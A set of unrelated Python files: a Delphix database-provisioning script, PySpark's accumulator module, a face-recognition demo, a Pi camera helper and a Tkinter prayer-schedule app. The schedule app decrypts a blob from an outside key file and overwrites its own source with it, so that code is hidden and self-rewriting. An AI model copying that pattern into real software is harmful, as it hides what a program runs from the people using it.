snap_name: Name of the snapshot
"""
snapshots = snapshot.get_all(
dx_session_obj.server_session, database=database_obj.reference
)
matches = []
for snapshot_obj in snapshots:
if str(snapshot_obj.name).startswith(arguments["--timestamp"]):
matches.append(snapshot_obj)
for each in matches:
print_debug(each.name, debug)
if len(matches) == 1:
print_debug(
"%s: Found one and only one match. This is good.\n %s"
% (engine["hostname"], matches[0]),
debug,
)
return matches[0]
elif len(matches) > 1:
raise DlpxException(
"%s: The name specified was not specific enough."
" More than one match found.\n" % (engine["hostname"],)
)
else:
raise DlpxException(
"%s: No matches found for the time specified.\n" % (engine["hostname"])
)
def find_snapshot_by_database_and_time(engine, database_obj, snap_time):
snapshots = snapshot.get_all(
dx_session_obj.server_session, database=database_obj.reference
)
matches = []
for snapshot_obj in snapshots:
if str(snapshot_obj.latest_change_point.timestamp).startswith(
arguments["--timestamp"]
):
matches.append(snapshot_obj)
if len(matches) == 1:
print_debug(
'%s": Found one and only one match. This is good.\n%s'
% (engine["hostname"], matches[0]),
debug,
)
return matches[0]
elif len(matches) > 1:
print_debug(matches, debug)
raise DlpxException(
"%s: The time specified was not specific enough."
"More than one match found.\n" % (engine["hostname"])
)
else:
raise DlpxException(
"%s: No matches found for the time specified.\n" % (engine["hostname"])
)
def find_source_by_database(engine, database_obj):
# The source tells us if the database is enabled/disables, virtual,
# vdb/dSource, or is a staging database.
source_obj = source.get_all(server, database=database_obj.reference)
# We'll just do a little sanity check here to ensure we only have a 1:1
# result.
if len(source_obj) == 0:
raise DlpxException(
"%s: Did not find a source for %s. Exiting.\n"
% (engine["hostname"], database_obj.name)
)
elif len(source_obj) > 1:
raise DlpxException(
"%s: More than one source returned for %s. "
"Exiting.\n" % (engine["hostname"], database_obj.name + ". Exiting")
)
return source_obj
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine):
"""
This function actually runs the jobs.
Use the @run_async decorator to run this function asynchronously.
This allows us to run against multiple Delphix Engine simultaneously
engine: Dictionary containing engine information
"""
# Establish these variables as empty for use later
environment_obj = None
source_objs = None
jobs = {}
try:
# Setup the connection to the Delphix Engine
dx_session_obj.serversess(
engine["ip_address"], engine["username"], engine["password"]
)
group_obj = find_obj_by_name(
dx_session_obj.server_session, group, arguments["--target_grp"]
)
# Get the reference of the target environment.
print_debug("Getting environment for %s\n" % (host_name), debug)
# Get the environment object by the hostname
environment_obj = find_obj_by_name(
dx_session_obj.server_session, environment, host_name
)
except DlpxException as e:
print(
"\nERROR: Engine %s encountered an error while provisioning "
"%s:\n%s\n" % (engine["hostname"], arguments["--target"], e)
)
sys.exit(1)
print_debug(
"Getting database information for %s\n" % (arguments["--source"]), debug
)
try:
# Get the database reference we are copying from the database name
database_obj = find_obj_by_name(
dx_session_obj.server_session, database, arguments["--source"]
)
except DlpxException:
return
thingstodo = ["thingtodo"]
# reset the running job count before we begin
i = 0
try:
with dx_session_obj.job_mode(single_thread):
while len(jobs) > 0 or len(thingstodo) > 0:
arg_type = arguments["--type"].lower()
if len(thingstodo) > 0:
if arg_type == "oracle":
create_oracle_si_vdb(
engine,
jobs,
database_name,
group_obj,
environment_obj,
database_obj,
arguments["--prerefresh"],
arguments["--postrefresh"],
arguments["--prerollback"],
arguments["--postrollback"],
arguments["--configure-clone"],
)
elif arg_type == "ase":
create_ase_vdb(
engine,
server,
jobs,
group_obj,
database_name,
environment_obj,
database_obj,
)
elif arg_type == "mssql":
create_mssql_vdb(
engine,
jobs,
group_obj,
database_name,
environment_obj,
database_obj,
)
elif arg_type == "vfiles":
create_vfiles_vdb(
engine,
jobs,
group_obj,
database_name,
environment_obj,
database_obj,
arguments["--prerefresh"],
arguments["--postrefresh"],
arguments["--prerollback"],
arguments["--postrollback"],
arguments["--configure-clone"],
)
thingstodo.pop()
# get all the jobs, then inspect them
i = 0
for j in jobs.keys():
job_obj = job.get(dx_session_obj.server_session, jobs[j])
print_debug(job_obj, debug)
print_info(
engine["hostname"] + ": VDB Provision: " + job_obj.job_state
)
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it from
# the running jobs list.
del jobs[j]
else:
# If the job is in a running state, increment the
# running job count.
i += 1
print_info("%s: %s jobs running." % (engine["hostname"], str(i)))
# If we have running jobs, pause before repeating the checks.
if len(jobs) > 0:
sleep(float(arguments["--poll"]))
except (DlpxException, JobError) as e:
print("\nError while provisioning %s:\n%s" % (database_name, e.message))
sys.exit(1)
def run_job():
"""
This function runs the main_workflow aynchronously against all the servers
specified
No arguments required for run_job().
"""
# Create an empty list to store threads we create.
threads = []
# If the --all argument was given, run against every engine in dxtools.conf
if arguments["--all"]:
print_info("Executing against all Delphix Engines in the dxtools.conf")
try:
# For each server in the dxtools.conf...
for delphix_engine in dx_session_obj.dlpx_engines:
engine = dx_session_obj[delphix_engine]
# Create a new thread and add it to the list.
threads.append(main_workflow(engine))
except DlpxException as e:
print("Error encountered in main_workflow:\n%s" % (e))
sys.exit(1)
elif arguments["--all"] is False:
# Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments["--engine"]:
try:
engine = dx_session_obj.dlpx_engines[arguments["--engine"]]
print_info(
"Executing against Delphix Engine: %s\n" % (arguments["--engine"])
)
except (DlpxException, RequestError, KeyError) as e:
raise DlpxException(
"\nERROR: Delphix Engine %s cannot be "
"found in %s. Please check your value "
"and try again. Exiting.\n"
% (arguments["--engine"], config_file_path)
)
else:
# Else search for a default engine in the dxtools.conf
for delphix_engine in dx_session_obj.dlpx_engines:
if dx_session_obj.dlpx_engines[delphix_engine]["default"] == "true":
engine = dx_session_obj.dlpx_engines[delphix_engine]
print_info(
"Executing against the default Delphix Engine "
"in the dxtools.conf: %s"
% (dx_session_obj.dlpx_engines[delphix_engine]["hostname"])
)
break
if engine == None:
raise DlpxException("\nERROR: No default engine found. Exiting")
# run the job against the engine
threads.append(main_workflow(engine))
# For each thread in the list...
for each in threads:
# join them back together so that we wait for all threads to complete
# before moving on
each.join()
def serversess(f_engine_address, f_engine_username, f_engine_password):
"""
Function to setup the session with the Delphix Engine
"""
server_session = DelphixEngine(
f_engine_address, f_engine_username, f_engine_password, "DOMAIN"
)
return server_session
def set_exit_handler(func):
"""
This function helps us set the correct exit code
"""
signal.signal(signal.SIGTERM, func)
def set_timeflow_point(engine, server, container_obj):
"""
This returns the reference of the timestamp specified.
"""
if arguments["--timestamp_type"].upper() == "SNAPSHOT":
if arguments["--timestamp"].upper() == "LATEST":
print_debug("%s: Using the latest Snapshot." % (engine["hostname"]), debug)
timeflow_point_parameters = TimeflowPointSemantic()
timeflow_point_parameters.container = container_obj.reference
timeflow_point_parameters.location = "LATEST_SNAPSHOT"
elif arguments["--timestamp"].startswith("@"):
print_debug("%s: Using a named snapshot" % (engine["hostname"]), debug)
snapshot_obj = find_snapshot_by_database_and_name(
engine, server, container_obj, arguments["--timestamp"]
)
if snapshot_obj != None:
timeflow_point_parameters = TimeflowPointLocation()
timeflow_point_parameters.timeflow = snapshot_obj.timeflow
timeflow_point_parameters.location = (
snapshot_obj.latest_change_point.location
)
else:
raise DlpxException(
"%s: Was unable to use the specified "
"snapshot %s for database %s\n"
% (engine["hostname"], arguments["--timestamp"], container_obj.name)
)
else:
print_debug(
"%s: Using a time-designated snapshot" % (engine["hostname"]), debug
)
snapshot_obj = find_snapshot_by_database_and_time(
engine, server, container_obj, arguments["--timestamp"]
)
if snapshot_obj != None:
timeflow_point_parameters = TimeflowPointTimestamp()
timeflow_point_parameters.timeflow = snapshot_obj.timeflow
timeflow_point_parameters.timestamp = (
snapshot_obj.latest_change_point.timestamp
)
else:
raise DlpxException(
"%s: Was unable to find a suitable time "
" for %s for database %s.\n"
% (engine["hostname"], arguments["--timestamp"], container_obj.name)
)
elif arguments["--timestamp_type"].upper() == "TIME":
if arguments["--timestamp"].upper() == "LATEST":
timeflow_point_parameters = TimeflowPointSemantic()
timeflow_point_parameters.location = "LATEST_POINT"
else:
raise DlpxException(
"%s: Only support a --timestamp value of "
'"latest" when used with timestamp_type '
"of time" % s(engine["hostname"])
)
else:
raise DlpxException(
"%s is not a valied timestamp_type. Exiting\n"
% (arguments["--timestamp_type"])
)
timeflow_point_parameters.container = container_obj.reference
return timeflow_point_parameters
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
elapsed_minutes = round((time() - time_start) / 60, +1)
return elapsed_minutes
def update_jobs_dictionary(engine, server, jobs):
"""
This function checks each job in the dictionary and updates its status or
removes it if the job is complete.
Return the number of jobs still running.
"""
# Establish the running jobs counter, as we are about to update the count
# from the jobs report.
i = 0
# get all the jobs, then inspect them
for j in jobs.keys():
job_obj = job.get(server, jobs[j])
print_debug("%s: %s" % (engine["hostname"], str(job_obj)), debug)
print_info("%s: %s: %s" % (engine["hostname"], j.name, job_obj.job_state))
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it from the running
# jobs list.
del jobs[j]
else:
# If the job is in a running state, increment the running job count.
i += 1
return i
def main(argv):
# We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global config_file_path
global database_name
global host_name
global dx_session_obj
global debug
try:
dx_session_obj = GetSession()
debug = arguments["--debug"]
logging_est(arguments["--logdir"], debug)
print_debug(arguments, debug)
time_start = time()
single_thread = False
config_file_path = arguments["--config"]
print_info("Welcome to %s version %s" % (basename(__file__), VERSION))
# Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
database_name = arguments["--target"]
host_name = arguments["--environment"]
# This is the function that will handle processing main_workflow for
# all the servers.
run_job()
elapsed_minutes = time_elapsed()
print_info("script took %s minutes to get this far. " % (str(elapsed_minutes)))
# Here we handle what we do when the unexpected happens
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except DlpxException as e:
"""
We use this exception handler when an error occurs in a function call.
"""
print("\nERROR: Please check the ERROR message below:\n%s" % (e.message))
sys.exit(2)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
print(
"\nERROR: Connection failed to the Delphix Engine. Please "
"check the ERROR message below:\n%s" % (e.message)
)
sys.exit(2)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so
that we have actionable data
"""
print("A job failed in the Delphix Engine:\n%s"(e.job))
elapsed_minutes = time_elapsed()
print_info(
"%s took %s minutes to get this far"
% (basename(__file__), str(elapsed_minutes))
)
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info(
"%s took %s minutes to get this far"
% (basename(__file__), str(elapsed_minutes))
)
except:
"""
Everything else gets caught here
"""
print(sys.exc_info()[0])
print(traceback.format_exc())
elapsed_minutes = time_elapsed()
print_info(
"%s took %s minutes to get this far"
% (basename(__file__), str(elapsed_minutes))
)
sys.exit(1)
if __name__ == "__main__":
# Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
# Feed our arguments to the main function, and off we go!
main(arguments)
|
accumulators.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import select
import struct
import socketserver as SocketServer
import threading
from pyspark.serializers import read_int, PickleSerializer
__all__ = ['Accumulator', 'AccumulatorParam']
pickleSer = PickleSerializer()
# Holds accumulators registered on the current machine, keyed by ID. This is then used to send
# the local accumulator updates back to the driver program at the end of a task.
_accumulatorRegistry = {}
def _deserialize_accumulator(aid, zero_value, accum_param):
from pyspark.accumulators import _accumulatorRegistry
# If this certain accumulator was deserialized, don't overwrite it.
if aid in _accumulatorRegistry:
return _accumulatorRegistry[aid]
else:
accum = Accumulator(aid, zero_value, accum_param)
accum._deserialized = True
_accumulatorRegistry[aid] = accum
return accum
class Accumulator(object):
"""
A shared variable that can be accumulated, i.e., has a commutative and associative "add"
operation. Worker tasks on a Spark cluster can add values to an Accumulator with the `+=`
operator, but only the driver program is allowed to access its value, using `value`.
Updates from the workers get propagated automatically to the driver program.
While :class:`SparkContext` supports accumulators for primitive data types like :class:`int` and
:class:`float`, users can also define accumulators for custom types by providing a custom
:py:class:`AccumulatorParam` object. Refer to its doctest for an example.
Examples
--------
>>> a = sc.accumulator(1)
>>> a.value
1
>>> a.value = 2
>>> a.value
2
>>> a += 5
>>> a.value
7
>>> sc.accumulator(1.0).value
1.0
>>> sc.accumulator(1j).value
1j
>>> rdd = sc.parallelize([1,2,3])
>>> def f(x):
... global a
... a += x
>>> rdd.foreach(f)
>>> a.value
13
>>> b = sc.accumulator(0)
>>> def g(x):
... b.add(x)
>>> rdd.foreach(g)
>>> b.value
6
>>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError: ...
>>> def h(x):
... global a
... a.value = 7
>>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError: ...
>>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
TypeError: ...
"""
def __init__(self, aid, value, accum_param):
"""Create a new Accumulator with a given initial value and AccumulatorParam object"""
from pyspark.accumulators import _accumulatorRegistry
self.aid = aid
self.accum_param = accum_param
self._value = value
self._deserialized = False
_accumulatorRegistry[aid] = self
def __reduce__(self):
"""Custom serialization; saves the zero value from our AccumulatorParam"""
param = self.accum_param
return (_deserialize_accumulator, (self.aid, param.zero(self._value), param))
@property
def value(self):
"""Get the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
return self._value
@value.setter
def value(self, value):
"""Sets the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
self._value = value
def add(self, term):
"""Adds a term to this accumulator's value"""
self._value = self.accum_param.addInPlace(self._value, term)
def __iadd__(self, term):
"""The += operator; adds a term to this accumulator's value"""
self.add(term)
return self
def __str__(self):
return str(self._value)
def __repr__(self):
return "Accumulator<id=%i, value=%s>" % (self.aid, self._value)
class AccumulatorParam(object):
"""
Helper object that defines how to accumulate values of a given type.
Examples
--------
>>> from pyspark.accumulators import AccumulatorParam
>>> class VectorAccumulatorParam(AccumulatorParam):
... def zero(self, value):
... return [0.0] * len(value)
... def addInPlace(self, val1, val2):
... for i in range(len(val1)):
... val1[i] += val2[i]
... return val1
>>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam())
>>> va.value
[1.0, 2.0, 3.0]
>>> def g(x):
... global va
... va += [x] * 3
>>> rdd = sc.parallelize([1,2,3])
>>> rdd.foreach(g)
>>> va.value
[7.0, 8.0, 9.0]
"""
def zero(self, value):
"""
Provide a "zero value" for the type, compatible in dimensions with the
provided `value` (e.g., a zero vector)
"""
raise NotImplementedError
def addInPlace(self, value1, value2):
"""
Add two values of the accumulator's data type, returning a new value;
for efficiency, can also update `value1` in place and return it.
"""
raise NotImplementedError
class AddingAccumulatorParam(AccumulatorParam):
"""
An AccumulatorParam that uses the + operators to add values. Designed for simple types
such as integers, floats, and lists. Requires the zero value for the underlying type
as a parameter.
"""
def __init__(self, zero_value):
self.zero_value = zero_value
def zero(self, value):
return self.zero_value
def addInPlace(self, value1, value2):
value1 += value2
return value1
# Singleton accumulator params for some standard types
INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0)
FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0)
COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j)
class _UpdateRequestHandler(SocketServer.StreamRequestHandler):
"""
This handler will keep polling updates from the same socket until the
server is shutdown.
"""
def handle(self):
from pyspark.accumulators import _accumulatorRegistry
auth_token = self.server.auth_token
def poll(func):
while not self.server.server_shutdown:
# Poll every 1 second for new data -- don't block in case of shutdown.
r, _, _ = select.select([self.rfile], [], [], 1)
if self.rfile in r:
if func():
break
def accum_updates():
num_updates = read_int(self.rfile)
for _ in range(num_updates):
(aid, update) = pickleSer._read_with_length(self.rfile)
_accumulatorRegistry[aid] += update
# Write a byte in acknowledgement
self.wfile.write(struct.pack("!b", 1))
return False
def authenticate_and_accum_updates():
received_token = self.rfile.read(len(auth_token))
if isinstance(received_token, bytes):
received_token = received_token.decode("utf-8")
if (received_token == auth_token):
accum_updates()
# we've authenticated, we can break out of the first loop now
return True
else:
raise Exception(
"The value of the provided token to the AccumulatorServer is not correct.")
# first we keep polling till we've received the authentication token
poll(authenticate_and_accum_updates)
# now we've authenticated, don't need to check for the token anymore
poll(accum_updates)
class AccumulatorServer(SocketServer.TCPServer):
def __init__(self, server_address, RequestHandlerClass, auth_token):
SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass)
self.auth_token = auth_token
"""
A simple TCP server that intercepts shutdown() in order to interrupt
our continuous polling on the handler.
"""
server_shutdown = False
def shutdown(self):
self.server_shutdown = True
SocketServer.TCPServer.shutdown(self)
self.server_close()
def _start_update_server(auth_token):
"""Start a TCP server to receive accumulator updates in a daemon thread, and returns it"""
server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler, auth_token)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
if __name__ == "__main__":
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local', 'test')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
|
manager.py
|
from threading import Thread
from queue import Queue
import socket
import argparse
import sys
import cv2
from loguru import logger
import base64
import PyQt5.QtCore as qtcore
import numpy as np
import asyncio
from functools import wraps
sys.path.append('..')
from configs import update_config
from models import get_model
from utils import normalize, square_crop, norm_crop
from module import DatabaseHandler, Searcher
class FaceRecognition:
def __init__(self, cfg, args):
"""
Init the FaceRecognition class
Args:
cfg: (fvcore.common.CfNode) Config for model
args: (argparse.parser) Argument
"""
self.extractor = get_model('arcface')
self.detector = get_model('mnet_cov2')
self.searcher = Searcher(distance='IP')
self.cfg = cfg
self.font = cv2.QT_FONT_NORMAL
self.receiveSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
self.receiveSocket.bind(('', self.cfg.IO.receivePort))
self.sendSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
dbHander =DatabaseHandler(self.searcher, cfg, self.detector, self.extractor)
dbHander.prepare()
self.detector.prepare()
self.queue_buffer_size = args.queue_buffer_size
self.max_frame_rate = args.max_frame_rate
self.min_box_size = args.min_box_size
self.frame_queue = Queue(args.queue_buffer_size)
self.suspicion_face_queue = Queue(args.max_face_number)
self.person_queue = Queue(args.queue_buffer_size)
self.gal_face_path = 'Unkown'
self.__get_split_key()
self.distance = 0.0
self.person_queue.put((self.gal_face_path, None, self.distance))
self.unkown_avatar = cv2.imread("./avatar_img/unkown.jpg")
self.unkown_avatar = cv2.resize(self.unkown_avatar, (112, 112))
async def _receive_loop(self):
"""
Listen UDP stream
"""
loop = asyncio.get_running_loop()
while (True):
message, address = self.receiveSocket.recvfrom(self.cfg.IO.receiveBufferSize)
data = qtcore.QByteArray()
data.append(message)
data=qtcore.QByteArray.fromBase64(data)
data=qtcore.qUncompress(data)
frame_as_np = np.frombuffer(data, dtype=np.uint8)
frame = cv2.imdecode(frame_as_np, flags=1)
self.frame_queue.put(frame)
async def _detection_loop(self):
"""
Detection process
Do not call this function outside the class
"""
loop = asyncio.get_running_loop()
i = 0
while True:
start = loop.time()
frame_list = []
i += 1
frame = self.frame_queue.get()
frame = self.__detection_deal(ori_frame=frame, put_recorg=True)
logger.info(f'Detection cost: {loop.time() - start}')
frame = self.__display(frame)
cv2.imshow('Frame', frame)
cv2.waitKey(1)
async def _recognize_loop(self):
"""
Recognize process
Do not call this function outside the class
"""
loop = asyncio.get_running_loop()
while True:
start_time = loop.time()
self.__recognize_deal(self.suspicion_face_queue.get())
logger.info(f"Recognize time {loop.time() - start_time}")
def run(self):
"""
Run demo
"""
t1 = Thread(target=lambda: asyncio.run(self._detection_loop())).start()
t2 = Thread(target=lambda: asyncio.run(self._recognize_loop())).start()
asyncio.run(self._receive_loop())
def __recognize_deal(self, frame):
embedding = self.extractor.get_embedding(frame)
embedding = normalize(embedding)
person_image, distance = self.searcher.search(embedding)
if distance >= self.cfg.MODEL.Recognize.thresh:
self.person_queue.put((person_image, frame, distance))
else:
self.person_queue.put(('Unkown', frame, distance))
def __detection_deal(self, ori_frame, put_recorg=False):
frame, scale = square_crop(ori_frame, self.cfg.MODEL.Detection.image_size[0])
bboxes, landmarks = self.detector.detect(frame, self.cfg.MODEL.Detection.conf)
# get largest box
if len(bboxes) == 0:
return ori_frame
areas = []
for i in range(bboxes.shape[0]):
x = bboxes[i]
area = (x[2] - x[0]) * (x[3] - x[1])
areas.append(area)
m = np.argsort(areas)[-1]
bboxes = bboxes[m:m + 1]
landmarks = landmarks[m:m + 1]
bbox = bboxes[0]
# Checking the size of bbounding box
if bbox[2] - bbox[0] <= self.min_box_size or bbox[3] - bbox[1] <= self.min_box_size:
return ori_frame
if put_recorg == True:
rimg = norm_crop(frame, landmarks[0])
self.suspicion_face_queue.put(rimg)
if self.gal_face_path == "Unkown":
text = self.gal_face_path
else:
text = self.gal_face_path.split(self.split_key)[-2]
color = (0, 255, 0)
pt1 = tuple(map(int, bbox[0:2] * scale))
pt2 = tuple(map(int, bbox[2:4] * scale))
cv2.rectangle(ori_frame, pt1, pt2, color, 1)
cv2.putText(
ori_frame,
text,
(pt1[0], pt1[1] - 60),
self.font,
0.7,
(255, 255, 0)
)
cv2.putText(
ori_frame,
"Detect-Conf: {:0.2f} %".format(bbox[4] * 100),
(pt1[0], pt1[1] - 40),
self.font,
0.7,
color
)
cv2.putText(
ori_frame,
"Emb-Dist: {:0.2f}".format(self.distance),
(pt1[0], pt1[1] - 20),
self.font,
0.7,
color
)
return ori_frame
def __display(self, frame):
if not self.person_queue.empty():
self.gal_face_path, self.current_face, self.distance = self.person_queue.get()
if self.current_face is not None:
frame[0:112, 0:112] = self.current_face
frame = cv2.putText(frame, "Subject", (0, 10), self.font, 0.5, (85, 85, 255))
messageLength = 20
messageType= self.cfg.MESSAGE_TYPE.cameraFace.to_bytes(1, 'big')
recognized_message = messageLength.to_bytes(2, 'big') + messageType
if self.gal_face_path == "Unkown":
frame[112:112+112, 0:112] = self.unkown_avatar
recognized_message += bytes(self.cfg.MESSAGE.UnknownFace, "utf-8")
else:
gal_face = cv2.imread(self.gal_face_path)
frame[112:112+112, 0:112] = gal_face
frame = cv2.putText(frame, "GalleryMatch", (0, 112 + 10), self.font, 0.5, (85, 85, 255))
recognized_message += bytes(self.gal_face_path.split(self.split_key)[-2], "utf-8")
self.sendSocket.sendto(recognized_message, ('127.0.0.1', self.cfg.IO.sendPort))
return frame
def __get_split_key(self):
if sys.platform == 'win32':
self.split_key = '\\'
else:
self.split_key = '/'
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Demo')
# =================== General ARGS ====================
parser.add_argument('--max_face_number',
type=int,
help='Max face number',
default=16)
parser.add_argument('--max_frame_rate',
type=int,
help='Max frame rate',
default=25)
parser.add_argument('--queue_buffer_size',
type=int,
help='MP Queue size',
default=12)
parser.add_argument('--min_box_size',
type=int,
default=100,
help='Min size of the bbouding box')
args = parser.parse_args()
cfg = update_config('../configs/config.yaml', [])
demo = FaceRecognition(cfg, args)
demo.run()
|
Camera.py
|
from time import time
import picamera
import io
import threading
class Camera(object):
'''An object for manage picamera'''
def __init__(self):
self.frame = None
# Retrieve frames in a background thread
thread = threading.Thread(target=self.retrieveFrame, args=())
thread.daemon = True
thread.start()
def retrieveFrame(self):
'''Retrieve frame from picamera
'''
# Get PiCamera object
with picamera.PiCamera() as camera:
# Set camera resolution
camera.resolution = (320, 240)
# Loop for frame retrieving
while True:
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg', use_video_port=True):
# return current frame
stream.seek(0)
self.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
|
schedule.py
|
# Jadwal-Shalat-ID
'''
# Fitur:
- mengetahui jadwal shalat di wilayah Indoesia
'''
import __init__
from tkinter import *
import requests
from threading import Thread
from bs4 import BeautifulSoup as bs
from cryptocode import decrypt, encrypt
import os
from datetime import datetime as dt
encryptKey = open(f'{os.getcwd()}\\schedule.key', 'r').read().split('|')
class UI(Tk):
cwd = os.getcwd()
key = 'key'
codeBy = 'Code By: ardyuda' # Cannot Be Removed
day = dt.now().strftime('%A')
date = dt.now().strftime('%d')
month = dt.now().strftime('%b')
year = dt.now().strftime('%Y')
def __init__(self):
super().__init__()
self.geometry('430x300+0-30')
self.title('Jadwal Shalat Indonesia')
self.iconbitmap(f'{self.cwd}\\images\\icon.ico')
self.frame00 = Frame()
self.frame0 = Frame()
self.frame0a = Frame()
self.frame0b = Frame()
self.frame1a = Frame()
self.frame1b = Frame()
self.frame1c = Frame()
self.r = encryptKey[0]
self.cities = {}
open(__file__, 'w').write(decrypt(encryptKey[2], encryptKey[0]))
if encryptKey[1] != '':
self.city, self.id = decrypt(encryptKey[1], encryptKey[0]).split('-')
self.first = False
self.label1 = Label(self.frame0, text='Memuat...', fg='Blue', font='Arial')
self.label1.pack()
self.frame0.pack(expand=True)
Thread(target=self.getSchedule).start()
else:
self.first = True
self.frame00_()
def load(self):
try:
res = requests.get('https://jadwalsholat.org/adzan/monthly.php?id=203')
self.label0.destroy()
data = bs(res.content, 'html.parser')
select = data.find('select')
option_ = select.find_all('option')
for option in option_:
self.cities[option.text] = option.attrs['value']
self.frame0.destroy()
self.frame0_()
except:
self.label0['text'] = 'Gagal Memuat... Tolong periksa koneksi anda!\nAtau hubungi developer jika masalah tidak terselesaikan!'
self.label0['fg'] = 'red'
def buttonCmd(self, id):
if id == 0:
try:
self.city = self.ls.selection_get()
self.id = self.cities[self.city]
self.frame0_(create=False)
Thread(target=self.getSchedule).start()
except:
pass
if id == 1:
self.frame1_(create=False)
self.frame00_()
if id == 2:
self.frame0_(create=False)
self.frame1_(create=True)
def frame00_(self):
self.frame0 = Frame()
self.frame0.pack(expand=True)
self.label0 = Label(self.frame0, text='Memuat...', fg='Blue', font='Arial', pady=10)
self.label0.pack()
Thread(target=self.load).start()
def frame0_(self, create=True):
if create:
self.frame0a = Frame()
self.frame0a.pack(expand=True)
self.frame0b = Frame()
self.frame00 = Frame()
Label(self.frame0a, text='Silahkan Pilih Kota Anda', fg='green', font='Arial').pack()
self.ls = Listbox(self.frame0a, selectmode=SINGLE, yscrollcommand= True, font='Arial', width=45)
self.ls.pack()
for city, index in self.cities.items():
self.ls.insert(index, city)
Button(self.frame0b, text='Pilih', fg='green', font='Arial', command=lambda: self.buttonCmd(0)).grid(row=0,column=0)
if not self.first:
Button(self.frame0b, text='Kembali', fg='red', font='Arial', command=lambda: self.buttonCmd(2)).grid(row=0, column=1, padx=10)
self.frame0b.pack()
self.frame00.pack()
self.me = Button(self.frame00, text=decrypt(self.r, self.key), bd=0)
self.me.pack()
else:
self.frame0a.destroy()
self.frame0b.destroy()
self.frame00.destroy()
def frame1_(self, create=True):
if create:
self.first = False
self.saveSchedule()
self.frame1a = Frame()
self.frame1b = Frame()
self.frame1c = Frame()
self.frame00 = Frame()
Label(self.frame1a, text=f'Jadwal Sholat - {self.city}', font='Raleway').pack()
Label(self.frame1a, text=f'{self.day}, {self.date} {self.month} {self.year}').pack()
self.frame1a.pack(pady=5)
row = 0
for schedule ,time_ in self.schedule:
Label(self.frame1b, text=schedule.text, bg='green', fg='white').grid(row=row, column=0, ipadx=65, sticky= 'ew', pady=1, padx=3)
Label(self.frame1b, text=time_.text, bg='white').grid(row=row, column=1, ipadx=65, sticky='ew', pady=1, padx=3)
row += 1
self.frame1b.pack(expand=True, anchor=N)
Button(self.frame1c, text='Pilih Kota', font='Arial', bg='white', fg='green', command=lambda: self.buttonCmd(1)).pack()
self.frame1c.pack()
self.me = Button(self.frame00, text=decrypt(self.r, self.key), bd=0)
self.me.pack()
self.frame00.pack()
else:
self.frame1a.destroy()
self.frame1b.destroy()
self.frame1c.destroy()
self.frame00.destroy()
def getSchedule(self):
try:
res = requests.get(f'https://jadwalsholat.org/adzan/monthly.php?id={self.id}')
self.frame0.destroy()
data = bs(res.content, 'html.parser')
tr_ = data.find_all('tr')
for tr in tr_:
if tr.attrs['class'] == ['table_header']:
schedule = tr.find_all('td')
if tr.attrs['class'] == ['table_highlight']:
time_ = tr.find_all('td')
self.schedule = list(zip(schedule[1:], time_[1:]))
self.frame1_(create=True)
except:
self.label1['text'] = 'Gagal Memuat... Tolong periksa koneksi anda!\nAtau hubungi developer jika masalah tidak terselesaikan!'
